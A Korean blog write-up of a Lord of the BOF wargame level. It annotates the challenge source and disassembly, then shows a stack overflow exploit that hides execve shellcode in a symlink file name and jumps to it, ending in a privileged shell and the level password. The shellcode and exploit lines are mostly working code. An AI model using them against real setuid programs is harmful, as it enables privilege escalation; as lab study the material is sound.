
[시스템해킹][LOB] Level10 : Vampire -> Skeleton

sh4n3e 2017. 6. 26. 11:40

 

 [vampire@localhost vampire]$ cat skeleton.c                      

/*             
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

/*
 * Challenge binary for LOB level 10 (vampire -> skeleton), listed as-is.
 * The overflow below is the intended vulnerability; these comments only
 * annotate what the code does and where the exploit surface is.
 *
 * Build notes: memset/strlen/strcpy are used without including string.h
 * and main has neither a return type nor a return statement -- pre-C99
 * implicit declarations that the original compiler accepted; a modern
 * compiler will typically warn or refuse.
 *
 * Frame layout (from the disassembly on this page: buffer at ebp-40,
 * i at ebp-44, saved_argc at ebp-48, saved ebp at ebp, return address
 * at ebp+4):
 *   argv[1][0..39]  -> buffer
 *   argv[1][40..43] -> saved ebp
 *   argv[1][44..47] -> return address (hence the 0xbf check on byte 47)
 */
main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        /* argv[1] is required. */
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // "egghunter": wipe every environment string in place so no
        // shellcode can be parked in an environment variable.
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // Byte 47 of argv[1] is the high byte (little-endian) of the
        // overwritten return address; it must be 0xbf, i.e. the return
        // address has to point into the stack.
        // NOTE: this runs BEFORE the length check below, so an argv[1]
        // shorter than 48 bytes reads past its terminator into whatever
        // follows it on the stack (an out-of-bounds read).
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // Length cap of 48 bytes: 40 (buffer) + 4 (saved ebp) + 4 (return
        // address). Exactly enough to control EIP, no room for shellcode
        // in the buffer itself.
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc (ebp+8) is copied aside before the strcpy: a 48-byte
        // argv[1] places its terminating NUL at buffer+48 == ebp+8,
        // clobbering argc's low byte, and the final loop needs the
        // original count.
        saved_argc = argc;

        // Unbounded copy of up to 49 bytes (48 + NUL) into a 40-byte
        // buffer: the overflow that overwrites saved ebp and the return
        // address.
        strcpy(buffer, argv[1]); 
        printf("%s\n", buffer);

        // "buffer hunter": zero the buffer so nothing survives in it.
        memset(buffer, 0, 40);

        // "ultra argv hunter": zero argv[0..argc-1] in place, including
        // argv[0] (the program name), so no argument string can hold
        // shellcode. It does NOT reach the second copy of the executable
        // path near the top of the stack (0xbfffff1d in the gdb dumps on
        // this page), which is still intact when main returns -- that is
        // what this level's exploit jumps into.
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));

        /* Falls off the end: the ret pops the overwritten return address. */
}

 

 (gdb) disass main
Dump of assembler code for function main:
0x8048500 <main>: push   %ebp
0x8048501 <main+1>: mov    %ebp,%esp
0x8048503 <main+3>: sub    %esp,48
0x8048506 <main+6>: cmp    DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg     0x8048523 <main+35>
0x804850c <main+12>: push   0x80486d0
0x8048511 <main+17>: call   0x8048410 <printf>
0x8048516 <main+22>: add    %esp,4
0x8048519 <main+25>: push   0
0x804851b <main+27>: call   0x8048420 <exit>
0x8048520 <main+32>: add    %esp,4
0x8048523 <main+35>: nop   
0x8048524 <main+36>: mov    DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop   
0x804852c <main+44>: lea    %esi,[%esi*1]
0x8048530 <main+48>: mov    %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea    %edx,[%eax*4]
0x804853a <main+58>: mov    %eax,%ds:0x8049804
0x804853f <main+63>: cmp    DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne    0x8048547 <main+71>
0x8048545 <main+69>: jmp    0x8048587 <main+135>
0x8048547 <main+71>: mov    %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea    %edx,[%eax*4]
0x8048551 <main+81>: mov    %eax,%ds:0x8049804
0x8048556 <main+86>: mov    %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push   %edx
0x804855a <main+90>: call   0x80483f0 <strlen>
0x804855f <main+95>: add    %esp,4
0x8048562 <main+98>: mov    %eax,%eax
0x8048564 <main+100>: push   %eax
0x8048565 <main+101>: push   0
0x8048567 <main+103>: mov    %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea    %edx,[%eax*4]
0x8048571 <main+113>: mov    %eax,%ds:0x8049804
0x8048576 <main+118>: mov    %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push   %edx
0x804857a <main+122>: call   0x8048430 <memset>
0x804857f <main+127>: add    %esp,12
0x8048582 <main+130>: inc    DWORD PTR [%ebp-44]
0x8048585 <main+133>: jmp    0x8048530 <main+48>
0x8048587 <main+135>: mov    %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add    %eax,4
0x804858d <main+141>: mov    %edx,DWORD PTR [%eax]
0x804858f <main+143>: add    %edx,47
0x8048592 <main+146>: cmp    BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je     0x80485b0 <main+176>
0x8048597 <main+151>: push   0x80486dc
0x804859c <main+156>: call   0x8048410 <printf>
0x80485a1 <main+161>: add    %esp,4
0x80485a4 <main+164>: push   0
0x80485a6 <main+166>: call   0x8048420 <exit>
0x80485ab <main+171>: add    %esp,4
0x80485ae <main+174>: mov    %esi,%esi
0x80485b0 <main+176>: mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add    %eax,4
0x80485b6 <main+182>: mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push   %edx
0x80485b9 <main+185>: call   0x80483f0 <strlen>
0x80485be <main+190>: add    %esp,4
0x80485c1 <main+193>: mov    %eax,%eax
0x80485c3 <main+195>: cmp    %eax,48
0x80485c6 <main+198>: jbe    0x80485e0 <main+224>
0x80485c8 <main+200>: push   0x80486f9
0x80485cd <main+205>: call   0x8048410 <printf>
0x80485d2 <main+210>: add    %esp,4
0x80485d5 <main+213>: push   0
0x80485d7 <main+215>: call   0x8048420 <exit>
0x80485dc <main+220>: add    %esp,4
0x80485df <main+223>: nop   
0x80485e0 <main+224>: mov    %eax,DWORD PTR [%ebp+8]
0x80485e3 <main+227>: mov    DWORD PTR [%ebp-48],%eax
0x80485e6 <main+230>: mov    %eax,DWORD PTR [%ebp+12]
0x80485e9 <main+233>: add    %eax,4
0x80485ec <main+236>: mov    %edx,DWORD PTR [%eax]
0x80485ee <main+238>: push   %edx
0x80485ef <main+239>: lea    %eax,[%ebp-40]
0x80485f2 <main+242>: push   %eax
0x80485f3 <main+243>: call   0x8048440 <strcpy>
0x80485f8 <main+248>: add    %esp,8
0x80485fb <main+251>: lea    %eax,[%ebp-40]
0x80485fe <main+254>: push   %eax
0x80485ff <main+255>: push   0x8048710
0x8048604 <main+260>: call   0x8048410 <printf>
0x8048609 <main+265>: add    %esp,8
0x804860c <main+268>: push   40
0x804860e <main+270>: push   0
0x8048610 <main+272>: lea    %eax,[%ebp-40]
0x8048613 <main+275>: push   %eax
0x8048614 <main+276>: call   0x8048430 <memset>
0x8048619 <main+281>: add    %esp,12
0x804861c <main+284>: mov    DWORD PTR [%ebp-44],0x0

0x8048623 <main+291>: mov    %eax,DWORD PTR [%ebp-44]
0x8048626 <main+294>: cmp    %eax,DWORD PTR [%ebp-48]
0x8048629 <main+297>: jl     0x8048630 <main+304>
0x804862b <main+299>: jmp    0x8048670 <main+368>
0x804862d <main+301>: lea    %esi,[%esi]
0x8048630 <main+304>: mov    %eax,DWORD PTR [%ebp-44]
0x8048633 <main+307>: lea    %edx,[%eax*4]
0x804863a <main+314>: mov    %eax,DWORD PTR [%ebp+12]
0x804863d <main+317>: mov    %edx,DWORD PTR [%eax+%edx]
0x8048640 <main+320>: push   %edx
0x8048641 <main+321>: call   0x80483f0 <strlen>
0x8048646 <main+326>: add    %esp,4
0x8048649 <main+329>: mov    %eax,%eax
0x804864b <main+331>: push   %eax
0x804864c <main+332>: push   0
0x804864e <main+334>: mov    %eax,DWORD PTR [%ebp-44]
0x8048651 <main+337>: lea    %edx,[%eax*4]
0x8048658 <main+344>: mov    %eax,DWORD PTR [%ebp+12]
0x804865b <main+347>: mov    %edx,DWORD PTR [%eax+%edx]
0x804865e <main+350>: push   %edx
0x804865f <main+351>: call   0x8048430 <memset>
0x8048664 <main+356>: add    %esp,12
0x8048667 <main+359>: inc    DWORD PTR [%ebp-44]
0x804866a <main+362>: jmp    0x8048623 <main+291>
0x804866c <main+364>: lea    %esi,[%esi*1]
0x8048670 <main+368>: leave 
0x8048671 <main+369>: ret   
0x8048672 <main+370>: nop   
0x8048673 <main+371>: nop   
0x8048674 <main+372>: nop   
0x8048675 <main+373>: nop   
0x8048676 <main+374>: nop   
0x8048677 <main+375>: nop   
0x8048678 <main+376>: nop   
0x8048679 <main+377>: nop   
0x804867a <main+378>: nop   
0x804867b <main+379>: nop   
0x804867c <main+380>: nop   
0x804867d <main+381>: nop   
0x804867e <main+382>: nop   
0x804867f <main+383>: nop   
End of assembler dump.

 

(gdb) b main    
Breakpoint 1 at 0x8048506
(gdb) b *main+369
Breakpoint 2 at 0x8048671
(gdb) r $(python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"')

Starting program: /home/vampire/sk $(python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"')

Breakpoint 1, 0x8048506 in main ()

(gdb) x/50s $ebp+0x139
0xbffffdc1:  ""
0xbffffdc2:  ""
0xbffffdc3:  ""
0xbffffdc4:  ""
0xbffffdc5:  ""
0xbffffdc6:  ""
0xbffffdc7:  "i686"
0xbffffdcc:  "/home/vampire/sk"
0xbffffddd:  'A' <repeats 44 times>, "����"
0xbffffe0e:  "PWD=/home/vampire"
0xbffffe20:  "REMOTEHOST=192.168.13.129"
0xbffffe3a:  "HOSTNAME=localhost.localdomain"
0xbffffe59:  "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffe7b:  "USER=vampire"
0xbffffe88:  "LS_COLORS="
0xbffffe93:  "MACHTYPE=i386-redhat-linux-gnu"
0xbffffeb2:  "MAIL=/var/spool/mail/vampire"
0xbffffecf:  "INPUTRC=/etc/inputrc"
0xbffffee4:  "BASH_ENV=/home/vampire/.bashrc"
0xbfffff03:  "LANG=en_US"
0xbfffff0e:  "DISPLAY=Kali2017:0"
0xbfffff21:  "LOGNAME=vampire"
0xbfffff31:  "SHLVL=1"
0xbfffff39:  "SHELL=/bin/bash2"
0xbfffff4a:  "USERNAME="
0xbfffff54:  "HOSTTYPE=i386"
0xbfffff62:  "OSTYPE=linux-gnu"
0xbfffff73:  "HISTSIZE=1000"
0xbfffff81:  "TERM=xterm-256color"
0xbfffff95:  "HOME=/home/vampire"
0xbfffffa8:  "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"
0xbfffffeb:  "/home/vampire/sk"
0xbffffffc:  ""

 

(gdb) x/10s 0xbffffdcc
0xbffffdcc:  ""
0xbffffdcd:  ""
0xbffffdce:  ""
0xbffffdcf:  ""
0xbffffdd0:  ""
0xbffffdd1:  ""
0xbffffdd2:  ""
0xbffffdd3:  ""
0xbffffdd4:  ""
0xbffffdd5:  ""
(gdb) x/10s 0xbfffffeb
0xbfffffeb:  "/home/vampire/sk"
0xbffffffc:  ""
0xbffffffd:  ""
0xbffffffe:  ""
0xbfffffff:  ""
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds> 

 

//test용 Symbolic Link => 주소값을 알아내기 위함 (GDB용). sk는 setuid가 아니므로 (아래 id 출력에 euid가 없음) 이 쪽에서 뜨는 쉘은 vampire 권한이다.

ln -s sk ./$(python -c 'print "\x90"*8+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"K"*150')

 

//실제 BOF용 (setuid skeleton 대상). 환경변수와 argv[0..argc-1]은 전부 0으로 지워지지만, 스택 최상단에 있는 실행 경로 문자열의 또 다른 복사본(위 gdb 덤프의 0xbfffff1d, main의 ret 시점에도 그대로 남아 있음)은 지워지지 않으므로 쉘코드를 파일 이름에 넣는다. 파일 이름이므로 쉘코드에 '/'(\x2f)와 \x00이 들어가면 안 된다. RET = 0xbfffff2d = 0xbfffff1d + 16("/home/vampire/./"의 길이) = NOP sled의 시작 주소.

ln -s skeleton ./$(python -c 'print "\x90"*8+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"K"*150')

 

(gdb) set disassembly-flavor intel
(gdb) disp/i $pc
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) r $(python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"')
Starting program: /home/vampire/./���������^1ɱ2�l���u�������2�Qi00tii0cjo��QT�⚱
                                                                                  ΁KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK

KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK $(python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"')

Breakpoint 1, 0x8048506 in main ()
1: x/i $eip  0x8048506 <main+6>: cmp    DWORD PTR [%ebp+8],1
 

 

(gdb) x/50s $esp+0x170
0xbffffc28:  ""
0xbffffc29:  ""
0xbffffc2a:  ""
0xbffffc2b:  "i686"
0xbffffc30:  "/home/vampire/./\220\220\220\220\220\220\220\220�\021^1ɱ2\200l\016�\001\200�\001u��\005�����2�Qi00tii0cjo\212�QT\212�\232�\f�\201", 'K' <repeats 128 times>...
0xbffffcf8:  'K' <repeats 22 times>
0xbffffd0f:  'A' <repeats 44 times>, "����"
0xbffffd40:  "PWD=/home/vampire"
0xbffffd52:  "REMOTEHOST=192.168.13.129"
0xbffffd6c:  "HOSTNAME=localhost.localdomain"
0xbffffd8b:  "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffdad:  "USER=vampire"
0xbffffdba:  "LS_COLORS="
0xbffffdc5:  "MACHTYPE=i386-redhat-linux-gnu"
0xbffffde4:  "MAIL=/var/spool/mail/vampire"
0xbffffe01:  "INPUTRC=/etc/inputrc"
0xbffffe16:  "BASH_ENV=/home/vampire/.bashrc"
0xbffffe35:  "LANG=en_US"
0xbffffe40:  "DISPLAY=Kali2017:0"
0xbffffe53:  "LOGNAME=vampire"
0xbffffe63:  "SHLVL=1"
0xbffffe6b:  "SHELL=/bin/bash2"
0xbffffe7c:  "USERNAME="
0xbffffe86:  "HOSTTYPE=i386"
0xbffffe94:  "OSTYPE=linux-gnu"
0xbffffea5:  "HISTSIZE=1000"
0xbffffeb3:  "TERM=xterm-256color"
0xbffffec7:  "HOME=/home/vampire"
0xbffffeda:  "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"
0xbfffff1d:  "/home/vampire/./\220\220\220\220\220\220\220\220�\021^1ɱ2\200l\016�\001\200�\001u��\005�����2�Qi00tii0cjo\212�QT\212�\232�\f�\201", 'K' <repeats 128 times>...
0xbfffffe5:  'K' <repeats 22 times>

0xbffffffc:  ""
0xbffffffd:  ""
0xbffffffe:  ""

 

 (gdb) b *main+369
Breakpoint 2 at 0x8048671
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����

Breakpoint 2, 0x8048671 in main ()
1: x/i $eip  0x8048671 <main+369>: ret

(gdb) x/50s 0xbffffc28
0xbffffc28:  ""
0xbffffc29:  ""
0xbffffc2a:  ""
0xbffffc2b:  "i686"
0xbffffc30:  ""
0xbffffc31:  ""
0xbffffc32:  ""
0xbffffc33:  ""
0xbffffc34:  ""
0xbffffc35:  ""
0xbffffc36:  ""
0xbffffc37:  ""
0xbffffc38:  ""
0xbffffc39:  ""
0xbffffc3a:  ""
0xbffffc3b:  ""
0xbffffc3c:  ""
0xbffffc3d:  ""
0xbffffc3e:  ""
0xbffffc3f:  ""
0xbffffc40:  ""
0xbffffc41:  ""
0xbffffc42:  ""

(gdb) x/50s 0xbfffff1d
0xbfffff1d:  "/home/vampire/./\220\220\220\220\220\220\220\220�\021^1ɱ2\200l\016�\001\200�\001u��\005�����2�Qi00tii0cjo\212�QT\212�\232�\f�\201", 'K' <repeats 128 times>...
0xbfffffe5:  'K' <repeats 22 times>
0xbffffffc:  ""
0xbffffffd:  ""
0xbffffffe:  ""
0xbfffffff:  ""
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>

 

[vampire@localhost vampire]$ ln -s sk ./$(python -c 'print "\x90"*8+"\xeb\x11\x5e\x31\xc9\xb1\x32>
<e\x81"+"K"*150') $(python -c 'print "A"*44+"\x2d\xff\xff\xbf"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-���
bash$ id
uid=509(vampire) gid=509(vampire) groups=509(vampire) 

 

[vampire@localhost vampire]$ ln -s skeleton ./$(python -c 'print "\x90"*8+"\xeb\x11\x5e\x31\xc9\x>
<x9a\xb1\x0c\xce\x81"+"K"*150') $(python -c 'print "A"*44+"\x2d\xff\xff\xbf"')                   
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-���
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder

 

 

 

 

 
